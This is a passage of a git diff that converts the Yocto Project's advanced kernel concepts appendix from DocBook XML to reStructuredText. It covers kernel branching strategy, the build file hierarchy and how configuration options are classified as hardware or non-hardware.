+Yocto Linux Kernel Architecture and Branching Strategies
+========================================================
+
+As mentioned earlier, a key goal of the Yocto Project is to present the
+developer with a kernel that has a clear and continuous history that is
+visible to the user. The architecture and mechanisms, in particular the
+branching strategies, used achieve that goal in a manner similar to
+upstream Linux kernel development in ``kernel.org``.
+
+You can think of a Yocto Linux kernel as consisting of a baseline Linux
+kernel with added features logically structured on top of the baseline.
+The features are tagged and organized by way of a branching strategy
+implemented by the Yocto Project team using the Source Code Manager
+(SCM) Git.
+
+.. note::
+
+ - Git is the obvious SCM for meeting the Yocto Linux kernel
+ organizational and structural goals described in this section. Not
+ only is Git the SCM for Linux kernel development in ``kernel.org``
+ but, Git continues to grow in popularity and supports many
+ different work flows, front-ends and management techniques.
+
+ - You can find documentation on Git at https://git-scm.com/doc. You can
+ also get an introduction to Git as it applies to the Yocto Project in the
+ ":ref:`overview-manual/overview-manual-development-environment:git`" section in the Yocto Project
+ Overview and Concepts Manual. The latter reference provides an
+ overview of Git and presents a minimal set of Git commands that
+ allows you to be functional using Git. You can use as much, or as
+ little, of what Git has to offer to accomplish what you need for
+ your project. You do not have to be a "Git Expert" in order to use
+ it with the Yocto Project.
+
+Using Git's tagging and branching features, the Yocto Project team
+creates kernel branches at points where functionality is no longer
+shared and thus, needs to be isolated. For example, board-specific
+incompatibilities would require different functionality and would
+require a branch to separate the features. Likewise, for specific kernel
+features, the same branching strategy is used.
+
+This "tree-like" architecture results in a structure that has features
+organized to be specific for particular functionality, single kernel
+types, or a subset of kernel types. Thus, the user has the ability to
+see the added features and the commits that make up those features. In
+addition to being able to see added features, the user can also view the
+history of what made up the baseline Linux kernel.
+
+Another consequence of this strategy results in not having to store the
+same feature twice internally in the tree. Rather, the kernel team
+stores the unique differences required to apply the feature onto the
+kernel type in question.
+
+.. note::
+
+ The Yocto Project team strives to place features in the tree such
+ that features can be shared by all boards and kernel types where
+ possible. However, during development cycles or when large features
+ are merged, the team cannot always follow this practice. In those
+ cases, the team uses isolated branches to merge features.
+
+BSP-specific code additions are handled in a similar manner to
+kernel-specific additions. Some BSPs only make sense given certain
+kernel types. So, for these types, the team creates branches off the end
+of that kernel type for all of the BSPs that are supported on that
+kernel type. From the perspective of the tools that create the BSP
+branch, the BSP is really no different than a feature. Consequently, the
+same branching strategy applies to BSPs as it does to kernel features.
+So again, rather than store the BSP twice, the team only stores the
+unique differences for the BSP across the supported multiple kernels.
+
+While this strategy can result in a tree with a significant number of
+branches, it is important to realize that from the developer's point of
+view, there is a linear path that travels from the baseline
+``kernel.org``, through a select group of features and ends with their
+BSP-specific commits. In other words, the divisions of the kernel are
+transparent and are not relevant to the developer on a day-to-day basis.
+From the developer's perspective, this path is the "master" branch in
+Git terms. The developer does not need to be aware of the existence of
+any other branches at all. Of course, value exists in the having these
+branches in the tree, should a person decide to explore them. For
+example, a comparison between two BSPs at either the commit level or at
+the line-by-line code ``diff`` level is now a trivial operation.
+
+The following illustration shows the conceptual Yocto Linux kernel.
+
+.. image:: figures/kernel-architecture-overview.png
+ :align: center
+
+In the illustration, the "Kernel.org Branch Point" marks the specific
+spot (or Linux kernel release) from which the Yocto Linux kernel is
+created. From this point forward in the tree, features and differences
+are organized and tagged.
+
+The "Yocto Project Baseline Kernel" contains functionality that is
+common to every kernel type and BSP that is organized further along in
+the tree. Placing these common features in the tree this way means
+features do not have to be duplicated along individual branches of the
+tree structure.
+
+From the "Yocto Project Baseline Kernel", branch points represent
+specific functionality for individual Board Support Packages (BSPs) as
+well as real-time kernels. The illustration represents this through
+three BSP-specific branches and a real-time kernel branch. Each branch
+represents some unique functionality for the BSP or for a real-time
+Yocto Linux kernel.
+
+In this example structure, the "Real-time (rt) Kernel" branch has common
+features for all real-time Yocto Linux kernels and contains more
+branches for individual BSP-specific real-time kernels. The illustration
+shows three branches as an example. Each branch points the way to
+specific, unique features for a respective real-time kernel as they
+apply to a given BSP.
+
+The resulting tree structure presents a clear path of markers (or
+branches) to the developer that, for all practical purposes, is the
+Yocto Linux kernel needed for any given set of requirements.
+
+.. note::
+
+ Keep in mind the figure does not take into account all the supported
+ Yocto Linux kernels, but rather shows a single generic kernel just
+ for conceptual purposes. Also keep in mind that this structure
+ represents the
+ :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+ that are either pulled from during the build or established on the
+ host development system prior to the build by either cloning a
+ particular kernel's Git repository or by downloading and unpacking a
+ tarball.
+
+Working with the kernel as a structured tree follows recognized
+community best practices. In particular, the kernel as shipped with the
+product, should be considered an "upstream source" and viewed as a
+series of historical and documented modifications (commits). These
+modifications represent the development and stabilization done by the
+Yocto Project kernel development team.
+
+Because commits only change at significant release points in the product
+life cycle, developers can work on a branch created from the last
+relevant commit in the shipped Yocto Project Linux kernel. As mentioned
+previously, the structure is transparent to the developer because the
+kernel tree is left in this state after cloning and building the kernel.
+
+Kernel Build File Hierarchy
+===========================
+
+Upstream storage of all the available kernel source code is one thing,
+while representing and using the code on your host development system is
+another. Conceptually, you can think of the kernel source repositories
+as all the source files necessary for all the supported Yocto Linux
+kernels. As a developer, you are just interested in the source files for
+the kernel on which you are working. And, furthermore, you need them
+available on your host system.
+
+Kernel source code is available on your host system several different
+ways:
+
+- *Files Accessed While using devtool:* ``devtool``, which is
+ available with the Yocto Project, is the preferred method by which to
+ modify the kernel. See the ":ref:`kernel-dev/kernel-dev-intro:kernel modification workflow`" section.
+
+- *Cloned Repository:* If you are working in the kernel all the time,
+ you probably would want to set up your own local Git repository of
+ the Yocto Linux kernel tree. For information on how to clone a Yocto
+ Linux kernel Git repository, see the
+ ":ref:`kernel-dev/kernel-dev-common:preparing the build host to work on the kernel`"
+ section.
+
+- *Temporary Source Files from a Build:* If you just need to make some
+ patches to the kernel using a traditional BitBake workflow (i.e. not
+ using the ``devtool``), you can access temporary kernel source files
+ that were extracted and used during a kernel build.
+
+The temporary kernel source files resulting from a build using BitBake
+have a particular hierarchy. When you build the kernel on your
+development system, all files needed for the build are taken from the
+source repositories pointed to by the
+:term:`SRC_URI` variable and gathered
+in a temporary work area where they are subsequently used to create the
+unique kernel. Thus, in a sense, the process constructs a local source
+tree specific to your kernel from which to generate the new kernel
+image.
+
+The following figure shows the temporary file structure created on your
+host system when you build the kernel using Bitbake. This
+:term:`Build Directory` contains all the
+source files used during the build.
+
+.. image:: figures/kernel-overview-2-generic.png
+ :align: center
+
+Again, for additional information on the Yocto Project kernel's
+architecture and its branching strategy, see the
+":ref:`kernel-dev/kernel-dev-concepts-appx:yocto linux kernel architecture and branching strategies`"
+section. You can also reference the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+and
+":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+sections for detailed example that modifies the kernel.
+
+Determining Hardware and Non-Hardware Features for the Kernel Configuration Audit Phase
+=======================================================================================
+
+This section describes part of the kernel configuration audit phase that
+most developers can ignore. For general information on kernel
+configuration including ``menuconfig``, ``defconfig`` files, and
+configuration fragments, see the
+":ref:`kernel-dev/kernel-dev-common:configuring the kernel`" section.
+
+During this part of the audit phase, the contents of the final
+``.config`` file are compared against the fragments specified by the
+system. These fragments can be system fragments, distro fragments, or
+user-specified configuration elements. Regardless of their origin, the
+OpenEmbedded build system warns the user if a specific option is not
+included in the final kernel configuration.
+
+By default, in order to not overwhelm the user with configuration
+warnings, the system only reports missing "hardware" options as they
+could result in a boot failure or indicate that important hardware is
+not available.
+
+To determine whether or not a given option is "hardware" or
+"non-hardware", the kernel Metadata in ``yocto-kernel-cache`` contains
+files that classify individual or groups of options as either hardware
+or non-hardware. To better show this, consider a situation where the
+``yocto-kernel-cache`` contains the following files:
+::
+
+ yocto-kernel-cache/features/drm-psb/hardware.cfg
+ yocto-kernel-cache/features/kgdb/hardware.cfg
+ yocto-kernel-cache/ktypes/base/hardware.cfg
+ yocto-kernel-cache/bsp/mti-malta32/hardware.cfg
+ yocto-kernel-cache/bsp/qemu-ppc32/hardware.cfg
+ yocto-kernel-cache/bsp/qemuarma9/hardware.cfg
+ yocto-kernel-cache/bsp/mti-malta64/hardware.cfg
+ yocto-kernel-cache/bsp/arm-versatile-926ejs/hardware.cfg
+ yocto-kernel-cache/bsp/common-pc/hardware.cfg
+ yocto-kernel-cache/bsp/common-pc-64/hardware.cfg
+ yocto-kernel-cache/features/rfkill/non-hardware.cfg
+ yocto-kernel-cache/ktypes/base/non-hardware.cfg
+ yocto-kernel-cache/features/aufs/non-hardware.kcf
+ yocto-kernel-cache/features/ocf/non-hardware.kcf
+ yocto-kernel-cache/ktypes/base/non-hardware.kcf
+ yocto-kernel-cache/ktypes/base/hardware.kcf
+ yocto-kernel-cache/bsp/qemu-ppc32/hardware.kcf
+
+The following list
+provides explanations for the various files:
+
+- ``hardware.kcf``: Specifies a list of kernel Kconfig files that
+ contain hardware options only.
+
+- ``non-hardware.kcf``: Specifies a list of kernel Kconfig files that
+ contain non-hardware options only.
+
+- ``hardware.cfg``: Specifies a list of kernel ``CONFIG_`` options that
+ are hardware, regardless of whether or not they are within a Kconfig
+ file specified by a hardware or non-hardware Kconfig file (i.e.
+ ``hardware.kcf`` or ``non-hardware.kcf``).
+
+- ``non-hardware.cfg``: Specifies a list of kernel ``CONFIG_`` options
+ that are not hardware, regardless of whether or not they are within a
+ Kconfig file specified by a hardware or non-hardware Kconfig file
+ (i.e. ``hardware.kcf`` or ``non-hardware.kcf``).
+
+Here is a specific example using the
+``kernel-cache/bsp/mti-malta32/hardware.cfg``:
+::
+
+ CONFIG_SERIAL_8250
+ CONFIG_SERIAL_8250_CONSOLE
+ CONFIG_SERIAL_8250_NR_UARTS
+ CONFIG_SERIAL_8250_PCI
+ CONFIG_SERIAL_CORE
+ CONFIG_SERIAL_CORE_CONSOLE
+ CONFIG_VGA_ARB
+
+The kernel configuration audit automatically detects
+these files (hence the names must be exactly the ones discussed here),
+and uses them as inputs when generating warnings about the final
+``.config`` file.
+
+A user-specified kernel Metadata repository, or recipe space feature,
+can use these same files to classify options that are found within its
+``.cfg`` files as hardware or non-hardware, to prevent the OpenEmbedded
+build system from producing an error or warning when an option is not in
+the final ``.config`` file.
diff --git a/documentation/kernel-dev/kernel-dev-concepts-appx.xml b/documentation/kernel-dev/kernel-dev-concepts-appx.xml
deleted file mode 100644
index 62c68527d2..0000000000
--- a/documentation/kernel-dev/kernel-dev-concepts-appx.xml
+++ /dev/null
@@ -1,621 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='kernel-dev-concepts-appx'>
-<title>Advanced Kernel Concepts</title>
-
- <section id='kernel-big-picture'>
- <title>Yocto Project Kernel Development and Maintenance</title>
-
- <para>
- Kernels available through the Yocto Project (Yocto Linux kernels),
- like other kernels, are based off the Linux kernel releases from
- <ulink url='http://www.kernel.org'></ulink>.
- At the beginning of a major Linux kernel development cycle, the
- Yocto Project team chooses a Linux kernel based on factors such as
- release timing, the anticipated release timing of final upstream
- <filename>kernel.org</filename> versions, and Yocto Project
- feature requirements.
- Typically, the Linux kernel chosen is in the final stages of
- development by the Linux community.
- In other words, the Linux kernel is in the release candidate
- or "rc" phase and has yet to reach final release.
- But, by being in the final stages of external development, the
- team knows that the <filename>kernel.org</filename> final release
- will clearly be within the early stages of the Yocto Project
- development window.
- </para>
-
- <para>
- This balance allows the Yocto Project team to deliver the most
- up-to-date Yocto Linux kernel possible, while still ensuring that
- the team has a stable official release for the baseline Linux
- kernel version.
- </para>
-
- <para>
- As implied earlier, the ultimate source for Yocto Linux kernels
- are released kernels from <filename>kernel.org</filename>.
- In addition to a foundational kernel from
- <filename>kernel.org</filename>, the available Yocto Linux kernels
- contain a mix of important new mainline developments, non-mainline
- developments (when no alternative exists), Board Support Package
- (BSP) developments, and custom features.
- These additions result in a commercially released Yocto
- Project Linux kernel that caters to specific embedded designer
- needs for targeted hardware.
- </para>
-
- <para>
- You can find a web interface to the Yocto Linux kernels in the
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
- at
- <ulink url='&YOCTO_GIT_URL;'></ulink>.
- If you look at the interface, you will see to the left a
- grouping of Git repositories titled "Yocto Linux Kernel".
- Within this group, you will find several Linux Yocto kernels
- developed and included with Yocto Project releases:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>linux-yocto-4.1</filename>:</emphasis>
- The stable Yocto Project kernel to use with the Yocto
- Project Release 2.0.
- This kernel is based on the Linux 4.1 released kernel.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto-4.4</filename>:</emphasis>
- The stable Yocto Project kernel to use with the Yocto
- Project Release 2.1.
- This kernel is based on the Linux 4.4 released kernel.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto-4.6</filename>:</emphasis>
- A temporary kernel that is not tied to any Yocto Project
- release.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto-4.8</filename>:</emphasis>
- The stable yocto Project kernel to use with the Yocto
- Project Release 2.2.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto-4.9</filename>:</emphasis>
- The stable Yocto Project kernel to use with the Yocto
- Project Release 2.3.
- This kernel is based on the Linux 4.9 released kernel.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto-4.10</filename>:</emphasis>
- The default stable Yocto Project kernel to use with the
- Yocto Project Release 2.3.
- This kernel is based on the Linux 4.10 released kernel.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto-4.12</filename>:</emphasis>
- The default stable Yocto Project kernel to use with the
- Yocto Project Release 2.4.
- This kernel is based on the Linux 4.12 released kernel.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>yocto-kernel-cache</filename>:</emphasis>
- The <filename>linux-yocto-cache</filename> contains
- patches and configurations for the linux-yocto kernel
- tree.
- This repository is useful when working on the linux-yocto
- kernel.
- For more information on this "Advanced Kernel Metadata",
- see the
- "<link linkend='kernel-dev-advanced'>Working With Advanced Metadata (<filename>yocto-kernel-cache</filename>)</link>"
- Chapter.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto-dev</filename>:</emphasis>
- A development kernel based on the latest upstream release
- candidate available.
- </para></listitem>
- </itemizedlist>
- <note><title>Notes</title>
- Long Term Support Initiative (LTSI) for Yocto Linux
- kernels is as follows:
- <itemizedlist>
- <listitem><para>
- For Yocto Project releases 1.7, 1.8, and 2.0,
- the LTSI kernel is
- <filename>linux-yocto-3.14</filename>.
- </para></listitem>
- <listitem><para>
- For Yocto Project releases 2.1, 2.2, and 2.3,
- the LTSI kernel is <filename>linux-yocto-4.1</filename>.
- </para></listitem>
- <listitem><para>
- For Yocto Project release 2.4, the LTSI kernel is
- <filename>linux-yocto-4.9</filename>
- </para></listitem>
- <listitem><para>
- <filename>linux-yocto-4.4</filename> is an LTS
- kernel.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- Once a Yocto Linux kernel is officially released, the Yocto
- Project team goes into their next development cycle, or upward
- revision (uprev) cycle, while still continuing maintenance on the
- released kernel.
- It is important to note that the most sustainable and stable way
- to include feature development upstream is through a kernel uprev
- process.
- Back-porting hundreds of individual fixes and minor features from
- various kernel versions is not sustainable and can easily
- compromise quality.
- </para>
-
- <para>
- During the uprev cycle, the Yocto Project team uses an ongoing
- analysis of Linux kernel development, BSP support, and release
- timing to select the best possible <filename>kernel.org</filename>
- Linux kernel version on which to base subsequent Yocto Linux
- kernel development.
- The team continually monitors Linux community kernel development
- to look for significant features of interest.
- The team does consider back-porting large features if they have a
- significant advantage.
- User or community demand can also trigger a back-port or creation
- of new functionality in the Yocto Project baseline kernel during
- the uprev cycle.
- </para>
-
- <para>
- Generally speaking, every new Linux kernel both adds features and
- introduces new bugs.
- These consequences are the basic properties of upstream
- Linux kernel development and are managed by the Yocto Project
- team's Yocto Linux kernel development strategy.
- It is the Yocto Project team's policy to not back-port minor
- features to the released Yocto Linux kernel.
- They only consider back-porting significant technological
- jumps &dash; and, that is done after a complete gap analysis.
- The reason for this policy is that back-porting any small to
- medium sized change from an evolving Linux kernel can easily
- create mismatches, incompatibilities and very subtle errors.
- </para>
-
- <para>
- The policies described in this section result in both a stable
- and a cutting edge Yocto Linux kernel that mixes forward ports of
- existing Linux kernel features and significant and critical new
- functionality.
- Forward porting Linux kernel functionality into the Yocto Linux
- kernels available through the Yocto Project can be thought of as
- a "micro uprev."
- The many “micro uprevs†produce a Yocto Linux kernel version with
- a mix of important new mainline, non-mainline, BSP developments
- and feature integrations.
- This Yocto Linux kernel gives insight into new features and
- allows focused amounts of testing to be done on the kernel,
- which prevents surprises when selecting the next major uprev.
- The quality of these cutting edge Yocto Linux kernels is evolving
- and the kernels are used in leading edge feature and BSP
- development.
- </para>
- </section>
-
- <section id='yocto-linux-kernel-architecture-and-branching-strategies'>
- <title>Yocto Linux Kernel Architecture and Branching Strategies</title>
-
- <para>
- As mentioned earlier, a key goal of the Yocto Project is
- to present the developer with a kernel that has a clear and
- continuous history that is visible to the user.
- The architecture and mechanisms, in particular the branching
- strategies, used achieve that goal in a manner similar to
- upstream Linux kernel development in
- <filename>kernel.org</filename>.
- </para>
-
- <para>
- You can think of a Yocto Linux kernel as consisting of a
- baseline Linux kernel with added features logically structured
- on top of the baseline.
- The features are tagged and organized by way of a branching
- strategy implemented by the Yocto Project team using the
- Source Code Manager (SCM) Git.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Git is the obvious SCM for meeting the Yocto Linux
- kernel organizational and structural goals described
- in this section.
- Not only is Git the SCM for Linux kernel development in
- <filename>kernel.org</filename> but, Git continues to
- grow in popularity and supports many different work
- flows, front-ends and management techniques.
- </para></listitem>
- <listitem><para>
- You can find documentation on Git at
- <ulink url='http://git-scm.com/documentation'></ulink>.
- You can also get an introduction to Git as it
- applies to the Yocto Project in the
- "<ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>"
- section in the Yocto Project Overview and Concepts
- Manual.
- The latter reference provides an overview of
- Git and presents a minimal set of Git commands
- that allows you to be functional using Git.
- You can use as much, or as little, of what Git
- has to offer to accomplish what you need for your
- project.
- You do not have to be a "Git Expert" in order to
- use it with the Yocto Project.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- Using Git's tagging and branching features, the Yocto Project
- team creates kernel branches at points where functionality is
- no longer shared and thus, needs to be isolated.
- For example, board-specific incompatibilities would require
- different functionality and would require a branch to
- separate the features.
- Likewise, for specific kernel features, the same branching
- strategy is used.
- </para>
-
- <para>
- This "tree-like" architecture results in a structure that has
- features organized to be specific for particular functionality,
- single kernel types, or a subset of kernel types.
- Thus, the user has the ability to see the added features and the
- commits that make up those features.
- In addition to being able to see added features, the user
- can also view the history of what made up the baseline
- Linux kernel.
- </para>
-
- <para>
- Another consequence of this strategy results in not having to
- store the same feature twice internally in the tree.
- Rather, the kernel team stores the unique differences required
- to apply the feature onto the kernel type in question.
- <note>
- The Yocto Project team strives to place features in the tree
- such that features can be shared by all boards and kernel
- types where possible.
- However, during development cycles or when large features
- are merged, the team cannot always follow this practice.
- In those cases, the team uses isolated branches to merge
- features.
- </note>
- </para>
-
- <para>
- BSP-specific code additions are handled in a similar manner to
- kernel-specific additions.
- Some BSPs only make sense given certain kernel types.
- So, for these types, the team creates branches off the end
- of that kernel type for all of the BSPs that are supported on
- that kernel type.
- From the perspective of the tools that create the BSP branch,
- the BSP is really no different than a feature.
- Consequently, the same branching strategy applies to BSPs as
- it does to kernel features.
- So again, rather than store the BSP twice, the team only
- stores the unique differences for the BSP across the supported
- multiple kernels.
- </para>
-
- <para>
- While this strategy can result in a tree with a significant number
- of branches, it is important to realize that from the developer's
- point of view, there is a linear path that travels from the
- baseline <filename>kernel.org</filename>, through a select
- group of features and ends with their BSP-specific commits.
- In other words, the divisions of the kernel are transparent and
- are not relevant to the developer on a day-to-day basis.
- From the developer's perspective, this path is the "master" branch
- in Git terms.
- The developer does not need to be aware of the existence of any
- other branches at all.
- Of course, value exists in the having these branches in the tree,
- should a person decide to explore them.
- For example, a comparison between two BSPs at either the commit
- level or at the line-by-line code <filename>diff</filename> level
- is now a trivial operation.
- </para>
-
- <para>
- The following illustration shows the conceptual Yocto
- Linux kernel.
- <imagedata fileref="figures/kernel-architecture-overview.png" width="6in" depth="7in" align="center" scale="100" />
- </para>
-
- <para>
- In the illustration, the "Kernel.org Branch Point" marks the
- specific spot (or Linux kernel release) from which the
- Yocto Linux kernel is created.
- From this point forward in the tree, features and differences
- are organized and tagged.
- </para>
-
- <para>
- The "Yocto Project Baseline Kernel" contains functionality that
- is common to every kernel type and BSP that is organized
- further along in the tree.
- Placing these common features in the tree this way means
- features do not have to be duplicated along individual
- branches of the tree structure.
- </para>
-
- <para>
- From the "Yocto Project Baseline Kernel", branch points represent
- specific functionality for individual Board Support Packages
- (BSPs) as well as real-time kernels.
- The illustration represents this through three BSP-specific
- branches and a real-time kernel branch.
- Each branch represents some unique functionality for the BSP
- or for a real-time Yocto Linux kernel.
- </para>
-
- <para>
- In this example structure, the "Real-time (rt) Kernel" branch has
- common features for all real-time Yocto Linux kernels and
- contains more branches for individual BSP-specific real-time
- kernels.
- The illustration shows three branches as an example.
- Each branch points the way to specific, unique features for a
- respective real-time kernel as they apply to a given BSP.
- </para>
-
- <para>
- The resulting tree structure presents a clear path of markers
- (or branches) to the developer that, for all practical
- purposes, is the Yocto Linux kernel needed for any given set of
- requirements.
- <note>
- Keep in mind the figure does not take into account all the
- supported Yocto Linux kernels, but rather shows a single
- generic kernel just for conceptual purposes.
- Also keep in mind that this structure represents the Yocto
- Project
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
- that are either pulled from during the build or established
- on the host development system prior to the build by either
- cloning a particular kernel's Git repository or by
- downloading and unpacking a tarball.
- </note>
- </para>
-
- <para>
- Working with the kernel as a structured tree follows recognized
- community best practices.
- In particular, the kernel as shipped with the product, should be
- considered an "upstream source" and viewed as a series of
- historical and documented modifications (commits).
- These modifications represent the development and stabilization
- done by the Yocto Project kernel development team.
- </para>
-
- <para>
- Because commits only change at significant release points in the
- product life cycle, developers can work on a branch created
- from the last relevant commit in the shipped Yocto Project Linux
- kernel.
- As mentioned previously, the structure is transparent to the
- developer because the kernel tree is left in this state after
- cloning and building the kernel.
- </para>
- </section>
-
- <section id='kernel-build-file-hierarchy'>
- <title>Kernel Build File Hierarchy</title>
-
- <para>
- Upstream storage of all the available kernel source code is
- one thing, while representing and using the code on your host
- development system is another.
- Conceptually, you can think of the kernel source repositories
- as all the source files necessary for all the supported
- Yocto Linux kernels.
- As a developer, you are just interested in the source files
- for the kernel on which you are working.
- And, furthermore, you need them available on your host system.
- </para>
-
- <para>
- Kernel source code is available on your host system several
- different ways:
- <itemizedlist>
- <listitem><para>
- <emphasis>Files Accessed While using <filename>devtool</filename>:</emphasis>
- <filename>devtool</filename>, which is available with the
- Yocto Project, is the preferred method by which to
- modify the kernel.
- See the
- "<link linkend='kernel-modification-workflow'>Kernel Modification Workflow</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Cloned Repository:</emphasis>
- If you are working in the kernel all the time, you probably
- would want to set up your own local Git repository of the
- Yocto Linux kernel tree.
- For information on how to clone a Yocto Linux kernel
- Git repository, see the
- "<link linkend='preparing-the-build-host-to-work-on-the-kernel'>Preparing the Build Host to Work on the Kernel</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Temporary Source Files from a Build:</emphasis>
- If you just need to make some patches to the kernel using
- a traditional BitBake workflow (i.e. not using the
- <filename>devtool</filename>), you can access temporary
- kernel source files that were extracted and used during
- a kernel build.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The temporary kernel source files resulting from a build using
- BitBake have a particular hierarchy.
- When you build the kernel on your development system, all files
- needed for the build are taken from the source repositories
- pointed to by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable and gathered in a temporary work area where they are
- subsequently used to create the unique kernel.
- Thus, in a sense, the process constructs a local source tree
- specific to your kernel from which to generate the new kernel
- image.
- </para>
-
- <para>
- The following figure shows the temporary file structure
- created on your host system when you build the kernel using
- Bitbake.
- This
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- contains all the source files used during the build.
- <imagedata fileref="figures/kernel-overview-2-generic.png"
- width="6in" depth="5in" align="center" scale="100" />
- </para>
-
- <para>
- Again, for additional information on the Yocto Project kernel's
- architecture and its branching strategy, see the
- "<link linkend='yocto-linux-kernel-architecture-and-branching-strategies'>Yocto Linux Kernel Architecture and Branching Strategies</link>"
- section.
- You can also reference the
- "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
- and
- "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
- sections for detailed example that modifies the kernel.
- </para>
- </section>
-
- <section id='determining-hardware-and-non-hardware-features-for-the-kernel-configuration-audit-phase'>
- <title>Determining Hardware and Non-Hardware Features for the Kernel Configuration Audit Phase</title>
-
- <para>
- This section describes part of the kernel configuration audit
- phase that most developers can ignore.
- For general information on kernel configuration including
- <filename>menuconfig</filename>, <filename>defconfig</filename>
- files, and configuration fragments, see the
- "<link linkend='configuring-the-kernel'>Configuring the Kernel</link>"
- section.
- </para>
-
- <para>
- During this part of the audit phase, the contents of the final
- <filename>.config</filename> file are compared against the
- fragments specified by the system.
- These fragments can be system fragments, distro fragments,
- or user-specified configuration elements.
- Regardless of their origin, the OpenEmbedded build system
- warns the user if a specific option is not included in the
- final kernel configuration.
- </para>
-
- <para>
- By default, in order to not overwhelm the user with
- configuration warnings, the system only reports missing
- "hardware" options as they could result in a boot
- failure or indicate that important hardware is not available.
- </para>
-
- <para>
- To determine whether or not a given option is "hardware" or
- "non-hardware", the kernel Metadata in
- <filename>yocto-kernel-cache</filename> contains files that
- classify individual or groups of options as either hardware
- or non-hardware.
- To better show this, consider a situation where the
- <filename>yocto-kernel-cache</filename> contains the following
- files:
- <literallayout class='monospaced'>
- yocto-kernel-cache/features/drm-psb/hardware.cfg
- yocto-kernel-cache/features/kgdb/hardware.cfg
- yocto-kernel-cache/ktypes/base/hardware.cfg
- yocto-kernel-cache/bsp/mti-malta32/hardware.cfg
- yocto-kernel-cache/bsp/qemu-ppc32/hardware.cfg
- yocto-kernel-cache/bsp/qemuarma9/hardware.cfg
- yocto-kernel-cache/bsp/mti-malta64/hardware.cfg
- yocto-kernel-cache/bsp/arm-versatile-926ejs/hardware.cfg
- yocto-kernel-cache/bsp/common-pc/hardware.cfg
- yocto-kernel-cache/bsp/common-pc-64/hardware.cfg
- yocto-kernel-cache/features/rfkill/non-hardware.cfg
- yocto-kernel-cache/ktypes/base/non-hardware.cfg
- yocto-kernel-cache/features/aufs/non-hardware.kcf
- yocto-kernel-cache/features/ocf/non-hardware.kcf
- yocto-kernel-cache/ktypes/base/non-hardware.kcf
- yocto-kernel-cache/ktypes/base/hardware.kcf
- yocto-kernel-cache/bsp/qemu-ppc32/hardware.kcf
- </literallayout>
- The following list provides explanations for the various
- files:
- <itemizedlist>
- <listitem><para>
- <filename>hardware.kcf</filename>:
- Specifies a list of kernel Kconfig files that contain
- hardware options only.
- </para></listitem>
- <listitem><para>
- <filename>non-hardware.kcf</filename>:
- Specifies a list of kernel Kconfig files that contain
- non-hardware options only.
- </para></listitem>
- <listitem><para>
- <filename>hardware.cfg</filename>:
- Specifies a list of kernel <filename>CONFIG_</filename>
- options that are hardware, regardless of whether or not
- they are within a Kconfig file specified by a hardware
- or non-hardware Kconfig file (i.e.
- <filename>hardware.kcf</filename> or
- <filename>non-hardware.kcf</filename>).
- </para></listitem>
- <listitem><para>
- <filename>non-hardware.cfg</filename>:
- Specifies a list of kernel <filename>CONFIG_</filename>
- options that are not hardware, regardless of whether or
- not they are within a Kconfig file specified by a
- hardware or non-hardware Kconfig file (i.e.
- <filename>hardware.kcf</filename> or
- <filename>non-hardware.kcf</filename>).
- </para></listitem>
- </itemizedlist>
- Here is a specific example using the
- <filename>kernel-cache/bsp/mti-malta32/hardware.cfg</filename>:
- <literallayout class='monospaced'>
- CONFIG_SERIAL_8250
- CONFIG_SERIAL_8250_CONSOLE
- CONFIG_SERIAL_8250_NR_UARTS
- CONFIG_SERIAL_8250_PCI
- CONFIG_SERIAL_CORE
- CONFIG_SERIAL_CORE_CONSOLE
- CONFIG_VGA_ARB
- </literallayout>
- The kernel configuration audit automatically detects these
- files (hence the names must be exactly the ones discussed here),
- and uses them as inputs when generating warnings about the
- final <filename>.config</filename> file.
- </para>
-
- <para>
- A user-specified kernel Metadata repository, or recipe space
- feature, can use these same files to classify options that are
- found within its <filename>.cfg</filename> files as hardware
- or non-hardware, to prevent the OpenEmbedded build system from
- producing an error or warning when an option is not in the
- final <filename>.config</filename> file.
- </para>
- </section>
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-customization.xsl b/documentation/kernel-dev/kernel-dev-customization.xsl
deleted file mode 100644
index 325b738e94..0000000000
--- a/documentation/kernel-dev/kernel-dev-customization.xsl
+++ /dev/null
@@ -1,26 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
